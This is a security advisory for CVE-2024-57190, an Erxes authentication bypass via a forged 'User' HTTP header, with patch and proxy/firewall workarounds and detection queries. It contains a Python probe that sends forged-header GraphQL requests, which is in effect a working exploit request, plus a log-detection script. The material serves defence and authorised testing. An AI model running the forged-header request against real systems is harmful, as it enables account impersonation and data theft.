CVE-2024-57190
📋 TL;DR
CVE-2024-57190 is an authentication bypass in Erxes: the application trusts a client-supplied `User` HTTP header, so an unauthenticated attacker can impersonate any account by forging that header on a request. It affects all Erxes deployments running versions before 1.6.1 and gives the attacker the impersonated user's access to the GraphQL endpoints and to the data behind them.
💻 Affected Systems
- Erxes
📦 What is this software?
Erxes by Erxes
⚠️ Risk & Real-World Impact
Worst Case
Complete system compromise where attackers can access all user data, modify configurations, execute arbitrary operations through GraphQL endpoints, and potentially pivot to other systems.
Likely Case
Unauthorized data access and manipulation, including viewing sensitive customer information, modifying business logic, and privilege escalation within the Erxes platform.
If Mitigated
Limited impact with proper network segmentation and monitoring, but still potential for data exposure if the vulnerability is exploited.
🎯 Exploit Status
Exploitation needs no credentials and no special tooling: a single HTTP request with a forged `User` header is enough, so anyone who can reach the service over the network can exploit it.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 1.6.1
Fix Commit: https://github.com/erxes/erxes/commit/4ed2ca797241d2ba0c9083feeadd9755c1310ce8
Restart Required: Yes
Instructions:
1. Back up your Erxes installation and data.
2. Update to Erxes version 1.6.1 or later.
3. Restart all Erxes services.
4. Verify the fix by re-testing the forged-header request described under "How to Verify"; it must no longer yield an authenticated identity.
🔧 Temporary Workarounds
Web Application Firewall Rule
Block or strip the User HTTP header at the WAF or reverse proxy before it reaches Erxes. Setting a proxied header to an empty string makes nginx drop it, and header names are case-insensitive, so `user` and `USER` are covered as well.
# Example nginx configuration:
location / {
proxy_set_header User "";
proxy_pass http://erxes_backend;
}
This only helps if every path to the Erxes backend goes through the proxy; block direct access to the backend port as well.
Network Segmentation
Restrict access to the Erxes GraphQL endpoints to trusted networks only. Port 3000 below is an example; use the port your Erxes gateway actually listens on.
# Example iptables rules:
iptables -A INPUT -p tcp --dport 3000 -s 10.0.0.0/8 -j ACCEPT
iptables -A INPUT -p tcp --dport 3000 -j DROP
Note that `-A` appends, so an earlier blanket ACCEPT rule would still win; insert the rules ahead of it (`-I`) if needed. If Erxes runs in Docker, published ports bypass the INPUT chain entirely; put the restriction in the DOCKER-USER chain instead.
🧯 If You Can't Patch
- Implement strict network access controls to limit who can reach the Erxes GraphQL endpoints
- Deploy a WAF or reverse proxy that strips or validates the User HTTP header before it reaches Erxes
🔍 How to Verify
Check if Vulnerable:
Send an unauthenticated request to the GraphQL endpoint once without a User header and once with a User header set to an existing account identifier. If the second request is answered as that user (for example, a query that requires authentication succeeds, or returns that user's identity) while the first is not, the system is vulnerable. Run this only against systems you are authorised to test.
Check Version:
Check the Erxes version in the admin panel, or for Docker deployments inspect the container image tag (for example `docker inspect --format '{{.Config.Image}}' erxes`, assuming the container is named erxes) or run `docker inspect erxes | grep -i version` if the image carries a version label.
Verify Fix Applied:
Attempt the same exploit after patching. Requests with malicious User headers should be rejected or properly authenticated.
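The two-request comparison above, as an added example script (not from the Erxes project or the original advisory). It sends an unauthenticated GraphQL query with and without a forged `User` header and compares the results. The query field `currentUser` is an assumption about the Erxes schema; substitute any query that only succeeds for an authenticated user. The header value is assumed to be the identifier of an existing account. Run it only against systems you are authorised to test.

```python
"""Probe for CVE-2024-57190: does the GraphQL endpoint honour a forged User header?

Added example, not Erxes project code. Assumptions not stated by the advisory:
  - the endpoint answers a `currentUser` query (field name assumed),
  - the forged header value is the identifier of an existing account.
"""
import json
import sys
import urllib.error
import urllib.request
from typing import Optional, Tuple

# Assumed query; replace with any query that only succeeds when authenticated.
GRAPHQL_QUERY = "{ currentUser { _id email } }"
HEADER_NAME = "User"  # the header named in the advisory


def build_request(url: str, forged_user: Optional[str] = None) -> urllib.request.Request:
    """Build an unauthenticated POST; optionally attach the forged User header."""
    headers = {"Content-Type": "application/json"}
    if forged_user is not None:
        headers[HEADER_NAME] = forged_user
    body = json.dumps({"query": GRAPHQL_QUERY}).encode()
    return urllib.request.Request(url, data=body, headers=headers, method="POST")


def send(req: urllib.request.Request, timeout: float = 10.0) -> Tuple[int, dict]:
    """Return (status, parsed JSON body); HTTP error statuses are returned, not raised."""
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            status, raw = resp.status, resp.read()
    except urllib.error.HTTPError as err:
        status, raw = err.code, err.read()
    try:
        return status, json.loads(raw.decode() or "{}")
    except ValueError:  # non-JSON body (e.g. an HTML error page)
        return status, {}


def current_user(body: dict):
    """Extract data.currentUser from a GraphQL response, or None if absent."""
    data = body.get("data") or {}
    return data.get("currentUser")


def classify(baseline: Tuple[int, dict], probe: Tuple[int, dict]) -> str:
    """Compare the header-less baseline with the forged-header probe.

    VULNERABLE     : the forged header produced an identity the baseline did not
                     have (or a different one), i.e. the header was trusted.
    INCONCLUSIVE   : the baseline already identifies a user, so the test ran with
                     ambient credentials and proves nothing.
    NOT_VULNERABLE : the probe yields no identity either (header ignored/rejected).
    """
    base_user = current_user(baseline[1])
    probe_user = current_user(probe[1])
    if probe_user and probe_user != base_user:
        return "VULNERABLE"
    if base_user:
        return "INCONCLUSIVE"
    return "NOT_VULNERABLE"


def check(url: str, forged_user: str) -> str:
    """Run both requests against a live endpoint and classify the outcome."""
    baseline = send(build_request(url))
    probe = send(build_request(url, forged_user))
    return classify(baseline, probe)


if __name__ == "__main__":
    # usage: python check.py https://erxes.example.com/graphql admin@example.com
    print(check(sys.argv[1], sys.argv[2]))
```

After patching to 1.6.1 or later, the same run should report NOT_VULNERABLE; an INCONCLUSIVE result means the machine running the check already has a session or IP-based trust and the test must be repeated from a clean client.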
📡 Detection & Monitoring
Log Indicators:
- Unusual User header values in HTTP logs
- GraphQL requests from unexpected IP addresses or users
- Authentication failures followed by successful requests with different User headers
Network Indicators:
- HTTP requests containing User headers with suspicious values
- GraphQL queries from unauthenticated sources
SIEM Query:
The User header is not logged by default; have the reverse proxy record it (nginx exposes it as `$http_user`) and forward those logs. With that field in place, a Splunk-style query such as the following surfaces every request that carried the header, since legitimate clients never send it (field names depend on your log pipeline):
source="erxes" AND http_user="*" AND NOT http_user="-"
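The log indicators above, turned into detection logic over sample access-log lines. This is an added example, not part of the original advisory or the Erxes project. It assumes an nginx reverse proxy in front of Erxes logging the header through the `$http_user` variable in the custom format shown in the docstring (nginx writes `-` when the header is absent); the log lines are constructed for the example.

```python
"""Flag requests that carried a client-supplied User header in proxy access logs.

Added example, not Erxes project code. Assumed nginx log format:

    log_format erxes '$remote_addr [$time_local] "$request" $status "$http_user"';

nginx substitutes "-" when the request had no User header.
"""
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) "(?P<user_hdr>[^"]*)"$'
)

# Constructed sample: one client fails auth then succeeds with a forged header,
# another sweeps through several identities, a third is a normal client.
SAMPLE_LOG = """\
203.0.113.7 [12/Jan/2025:10:00:01 +0000] "POST /graphql HTTP/1.1" 401 "-"
203.0.113.7 [12/Jan/2025:10:00:02 +0000] "POST /graphql HTTP/1.1" 200 "admin"
198.51.100.9 [12/Jan/2025:10:00:03 +0000] "POST /graphql HTTP/1.1" 200 "admin"
198.51.100.9 [12/Jan/2025:10:00:04 +0000] "POST /graphql HTTP/1.1" 200 "support"
198.51.100.9 [12/Jan/2025:10:00:05 +0000] "POST /graphql HTTP/1.1" 200 "owner"
203.0.113.7 [12/Jan/2025:10:00:06 +0000] "GET /health HTTP/1.1" 200 "-"
192.0.2.10 [12/Jan/2025:10:00:07 +0000] "POST /graphql HTTP/1.1" 200 "-"
"""


def parse(line: str) -> Optional[dict]:
    """Parse one log line into a dict, or None if it does not match the format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def has_user_header(rec: dict) -> bool:
    return rec["user_hdr"] not in ("", "-")


def find_forged_header_requests(log_text: str) -> List[dict]:
    """Indicator 1: every request that carried a User header at all."""
    return [rec for rec in map(parse, log_text.splitlines()) if rec and has_user_header(rec)]


def impersonation_sweeps(hits: List[dict], min_distinct: int = 2) -> Dict[str, List[str]]:
    """Indicator 2: source IPs that presented several distinct User values,
    which looks like an attacker enumerating accounts to impersonate."""
    by_ip = defaultdict(set)
    for rec in hits:
        by_ip[rec["ip"]].add(rec["user_hdr"])
    return {ip: sorted(users) for ip, users in by_ip.items() if len(users) >= min_distinct}


def failure_then_forged_success(log_text: str) -> List[Tuple[str, str]]:
    """Indicator 3: an auth failure (401/403) from an IP followed later by a 2xx
    from the same IP that carried a User header. Returns (ip, header value)."""
    failed = set()
    found = []
    for rec in map(parse, log_text.splitlines()):
        if not rec:
            continue
        if rec["status"] in (401, 403):
            failed.add(rec["ip"])
        elif rec["ip"] in failed and has_user_header(rec) and 200 <= rec["status"] < 300:
            found.append((rec["ip"], rec["user_hdr"]))
    return found


if __name__ == "__main__":
    hits = find_forged_header_requests(SAMPLE_LOG)
    print(f"{len(hits)} request(s) carried a User header")
    print("identity sweeps:", impersonation_sweeps(hits))
    print("failure then forged success:", failure_then_forged_success(SAMPLE_LOG))
```

Because a legitimate browser or API client never sends a `User` header, the first indicator alone is high-signal; the other two help rank which source to investigate first once the header shows up in volume.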